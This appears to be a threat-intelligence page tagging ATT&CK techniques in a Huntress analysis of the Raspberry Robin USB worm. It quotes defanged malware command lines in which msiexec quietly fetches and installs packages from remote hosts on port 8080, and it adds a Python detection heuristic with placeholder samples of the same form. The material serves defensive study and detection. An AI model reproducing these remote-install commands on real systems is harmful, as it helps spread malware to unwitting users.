TTPwire Vol. 1 · MITRE ATT&CK · Tagged


Huntress

Evolution of USB-Borne Malware, Raspberry Robin | Huntress

2023-09-07

ATT&CK techniques detected

11 predictions
T1547.001 Registry Run Keys / Startup Folder
100%
“….]bz:8080/aoa3lshnjcafim/hmgkh/62oyni/<redacted>" enksxm=kdvz vtecb=bhlmevjk -quiet \ twx=iy ldp=vefglpn \ tmcxwt=zttloku Finally, persistence is established by creating a value beneath the user’s RunOnce registry key. As Microsoft stated: entries in …”
T1218.007 Msiexec
99%
“…ju/machine=user" msiexec hbelpyii=tpvbe wywsziubg=mpv /i "http://ejk[.]bz:8080/bc/a3y7fxb0odmxkstfqgyd/machine?user" -quiet zs=xkg kvbzhtp=upyzqtff vqtpdg=mwbmsiexec zkrz=ctx /qn wzd=vgaoygd /package "http://jrx[.]fr:8080/yky…”
T1091 Replication Through Removable Media
98%
“Evolution of USB-Borne Malware, Raspberry Robin | Huntress. Due to our extensive and diverse customer base, Huntress “sees” a good bit of the same malicious activity others are seeing, albeit often from a slightly different perspective. One example of this is, not long ago, Hu…”
T1059.003 Windows Command Shell
93%
“….ico These commands redirect or “pipe” the contents of the “junk” files into the command processor, denoted by either “cmd” or “!comspec!”. More recently, Huntress observed a command line that contained a significant amount of ‘white space’ with the command line itself…”
T1091 Replication Through Removable Media
81%
“endpoint Windows Event Logs indicates that the USB device in question was connected to the endpoint repeatedly during January 2023, the earliest observed time being on January 6, 2023. Each time the device was connected to the endpoint, Windows Defender detected the file “D:\…”
T1091 Replication Through Removable Media
78%
“been described as a “USB worm”, as USB devices are the primary delivery mechanism that has been observed to this point. Users interact with a file on a USB device, and then their system becomes infected with the Raspberry Robin malware. Raspberry Robin has been seen to be part …”
T1204.002 Malicious File
75%
“…/zjc[.]bz:8080. Huntress detected the Raspberry Robin execution pattern. 12:23:06Z Windows Defender detects downloaded file “C:\ProgramData\rmbizw\felgs.evmg” and submits it to the Defender cloud. 12:24:06Z Windows Defender detects the submitted file as “…”
T1059.003 Windows Command Shell
57%
“the command. For example, as with previous commands in the infection process, the command itself is of mixed case, alternating between upper- and lower-case letters. The domain accessed for the resource is most often three characters long, and the top-level domain is two cha…”
T1518.001 Security Software Discovery
55%
“Managed EDR and Managed Microsoft Defender enable both active defense against threats as they take place and visibility over how these threats appear. As shown in the above example, pivoting from managed AV detections can reveal an infection chain, highlighting other touchpoints…”
T1218.007 Msiexec
48%
“the command. For example, as with previous commands in the infection process, the command itself is of mixed case, alternating between upper- and lower-case letters. The domain accessed for the resource is most often three characters long, and the top-level domain is two cha…”
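The msiexec command lines quoted under T1218.007 and the command-line traits described in the T1059.003 and T1218.007 snippets (junk files redirected into cmd or !comspec!, heavy whitespace padding, mixed-case tokens, a short domain with a two-character TLD on port 8080, quiet installs with junk key=value properties) lend themselves to a simple command-line triage rule. The script below is an added example written for this page; it is not Huntress's code and not part of the original article. The sample command lines, hostnames and paths in `SAMPLES` are constructed placeholders, and the scoring thresholds (40 characters of padding, three junk properties, a score of 3 to flag) are assumptions chosen for illustration.

```python
"""Heuristic triage of process command lines for the Raspberry Robin patterns
summarised on this page: junk files redirected into cmd / !COMSPEC!, whitespace-
padded and mixed-case command lines, and msiexec fetching a package from a short
domain with a two-character TLD on port 8080, quietly, with junk key=value args.

Added example (not Huntress's code). SAMPLES are constructed for illustration;
hosts and paths are placeholders, not real indicators. Thresholds are assumptions.
"""
import re

# host (possibly defanged as a[.]b) and optional port of an http(s) URL
URL_RE = re.compile(r"https?://([a-z0-9-]+(?:\[?\.\]?[a-z0-9-]+)+)(?::(\d+))?", re.I)
# property-style arguments as shown on the page, e.g. enksxm=kdvz
JUNK_KV_RE = re.compile(r"\b[a-z]{2,12}\s*=\s*[a-z]{2,12}\b", re.I)
# cmd or !COMSPEC! with stdin redirected from a file ("cmd < junk.ico")
REDIRECT_RE = re.compile(r"(?:^|\s)(?:cmd(?:\.exe)?|[!%]comspec[!%])\s*<\s*(\S+)", re.I)
QUIET_RE = re.compile(r"(?:^|\s)[-/](?:q[nb]?|quiet)\b", re.I)
SCRIPT_EXTS = (".bat", ".cmd", ".txt")


def is_mixed_case(token: str) -> bool:
    """True for tokens like 'mSiExEc' whose letters flip case unusually often."""
    letters = [c for c in token if c.isalpha()]
    if len(letters) < 4:
        return False
    flips = sum(a.isupper() != b.isupper() for a, b in zip(letters, letters[1:]))
    return flips >= len(letters) // 2


def analyze(cmdline: str) -> dict:
    """Return a score, the matched heuristics and a verdict for one command line."""
    reasons = set()
    collapsed = re.sub(r"\s+", " ", cmdline).strip()
    # The page: a command line "contained a significant amount of white space".
    if len(cmdline) - len(collapsed) > 40:  # assumed threshold
        reasons.add("whitespace_padding")
    m = REDIRECT_RE.search(collapsed)
    if m:
        reasons.add("stdin_redirect_to_command_processor")
        # The redirected "junk" file carries a non-script extension (.ico on the page).
        if not m.group(1).strip('"').lower().endswith(SCRIPT_EXTS):
            reasons.add("redirect_from_non_script_file")
    tokens = collapsed.split()
    exe = tokens[0].strip('"').lower().rsplit("\\", 1)[-1] if tokens else ""
    if exe in ("msiexec", "msiexec.exe"):
        for host, port in URL_RE.findall(collapsed):
            reasons.add("msiexec_remote_package")
            labels = host.replace("[.]", ".").lower().split(".")
            # "most often three characters long" with a two-character TLD
            if len(labels) == 2 and len(labels[0]) <= 4 and len(labels[1]) == 2:
                reasons.add("short_domain_two_char_tld")
            if port == "8080":
                reasons.add("port_8080")
        if QUIET_RE.search(collapsed):
            reasons.add("quiet_install")
        if len(JUNK_KV_RE.findall(collapsed)) >= 3:  # assumed threshold
            reasons.add("junk_property_args")
    if any(is_mixed_case(t) for t in tokens):
        reasons.add("mixed_case_tokens")
    return {"score": len(reasons), "reasons": sorted(reasons), "suspicious": len(reasons) >= 3}


# Constructed sample command lines (placeholders, not real indicators).
SAMPLES = {
    "junk_ico_padded": "cmd" + " " * 60 + "<" + " " * 30 + r"D:\abc\qwe.ico",
    "comspec_redirect": r"!cOmSpEc! < D:\abc\qwe.ico",
    "msiexec_remote": 'mSiExEc /i "http://abc[.]zz:8080/bc/placeholder" -quiet '
                      "enksxm=kdvz vtecb=bhlmevjk twx=iy",
    "benign_msi": r'msiexec.exe /i "C:\Users\alice\Downloads\setup.msi" /qn',
    "benign_cmd": "cmd.exe /c dir",
}


def scan(samples=SAMPLES) -> dict:
    """Run analyze() over a name -> command line mapping."""
    return {name: analyze(cl) for name, cl in samples.items()}


if __name__ == "__main__":
    for name, result in scan().items():
        print(f"{name:18} score={result['score']} suspicious={result['suspicious']} {result['reasons']}")
```

Feed `analyze()` the command-line field from Sysmon event 1 or Security event 4688 records; the benign `msiexec.exe /i local.msi /qn` sample scores only for the quiet flag and stays below the flag threshold, while the padded `cmd <` redirect and the mixed-case remote msiexec install each trip several independent heuristics, which is what keeps the rule useful against the randomised junk properties and paths the page describes.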
T1562.001 Impair Defenses: Disable or Modify Tools
45%
“Managed EDR and Managed Microsoft Defender enable both active defense against threats as they take place and visibility over how these threats appear. As shown in the above example, pivoting from managed AV detections can reveal an infection chain, highlighting other touchpoints…”

Summary

A deep dive into the USB-borne Raspberry Robin malware and how Huntress Managed EDR and Managed Antivirus can detect and mitigate this threat.